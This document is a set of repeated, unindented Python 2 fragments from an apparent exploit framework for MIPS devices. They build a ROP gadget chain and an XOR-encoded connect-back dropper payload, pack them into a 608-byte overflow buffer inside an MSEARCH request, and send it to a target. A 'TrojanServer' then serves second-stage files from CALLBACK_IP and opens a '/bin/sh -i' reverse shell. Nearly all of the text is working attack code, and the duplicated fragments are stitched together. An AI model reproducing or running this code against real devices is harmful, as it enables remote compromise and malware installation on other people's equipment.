search_value=sys.argv[1]
if search_value.startswith("0x"):
value=int(search_value,16)
offset=buf.find_offset(value)
if(offset < 0):
print "Couldn't find value %s in the overflow buffer." % search_value
else:
print "Found value %s at\noffset: %d" % (search_value,offset)
exit(0)
addr=sys.argv[1]
port=int(sys.argv[2])
pid=1
files_to_serve=["./stage2dropper","./helloworld"]
server=TrojanServer(CALLBACK_IP,files_to_serve,connectback_shell=True,startcmd="/bin/sh -i")
pid=server.serve()
time.sleep(1)
if pid:
try:
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((addr,port))
logger.LOG_INFO("sending exploit.")
sock.send(str(buf))
sock.close()
server.wait()
except Exception as e:
logger.LOG_WARN("Failed to connect. ")
logger.LOG_WARN("Failed to connect. Killing connect-back server.")
search_value=sys.argv[1]
if search_value.startswith("0x"):
value=int(search_value,16)
offset=buf.find_offset(value)
if(offset < 0):
print "Couldn't find value %s in the overflow buffer." % search_value
else:
print "Found value %s at\noffset: %d" % (search_value,offset)
exit(0)
addr=sys.argv[1]
port=int(sys.argv[2])
pid=1
files_to_serve=["./stage2dropper","./helloworld"]
server=TrojanServer(CALLBACK_IP,files_to_serve,connectback_shell=True,startcmd="/bin/sh -i")
pid=server.serve()
time.sleep(1)
if pid:
try:
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((addr,port))
logger.LOG_INFO("sending exploit.")
sock.send(str(buf))
sock.close()
server.wait()
except Exception as e:
logger.LOG_WARN("Failed to connect. ")
logger.LOG_WARN("Failed to connect. Killing connect-back server.")
################################################################################
# locate stack. add 0x48+var_30+$sp into $s5, jalr $s6
################################################################################
section = SC.gadget_section(240, 0x328F4, description="add offset from $sp into s5, jalr $s6")
################################################################################
# jump into stack. jalr $s5. This needs to get loaded into the stackfinder's jalr reg
################################################################################
section = SC.gadget_section(
192, 0x1B1F4, description="Jump into stack via reg $s5. make sure the stackfinder jumps to this gadget."
)
files_to_serve = ["./stage2", "./tk.tar.gz"]
connectback_server = TrojanServer(CALLBACK_IP, files_to_serve, port=8080, startcmd="/bin/sh -i", connectback_shell=True)
payload = TrojanDropper(CALLBACK_IP, BigEndian, port=8080)
encoded_payload = MipsXorEncoder(payload, badchars=["\0"])
SC.string_section(268, encoded_payload.shellcode, description="connect back payload")
buffer_overflow_string = OverflowBuffer(BigEndian, 608, SC.section_list)
pretty_msearch = msearch_crash.MsearchCrash(buffer_overflow_string.pretty_string())
print "\n\n" + str(pretty_msearch) + "\n\n"
msearch_string = msearch_crash.MsearchCrash(buffer_overflow_string)
################################################################################
#jump into stack. jalr $s5. This needs to get loaded into the stackfinder's jalr reg
################################################################################
section = SC.gadget_section(
192,
0x1B1F4,
description=
"Jump into stack via reg $s5. make sure the stackfinder jumps to this gadget."
)
files_to_serve = ["./stage2", "./tk.tar.gz"]
connectback_server = TrojanServer(CALLBACK_IP,
files_to_serve,
port=8080,
startcmd="/bin/sh -i",
connectback_shell=True)
payload = TrojanDropper(CALLBACK_IP, BigEndian, port=8080)
encoded_payload = MipsXorEncoder(payload, badchars=['\0'])
SC.string_section(268,
encoded_payload.shellcode,
description="connect back payload")
buffer_overflow_string = OverflowBuffer(BigEndian, 608, SC.section_list)
pretty_msearch = msearch_crash.MsearchCrash(
buffer_overflow_string.pretty_string())
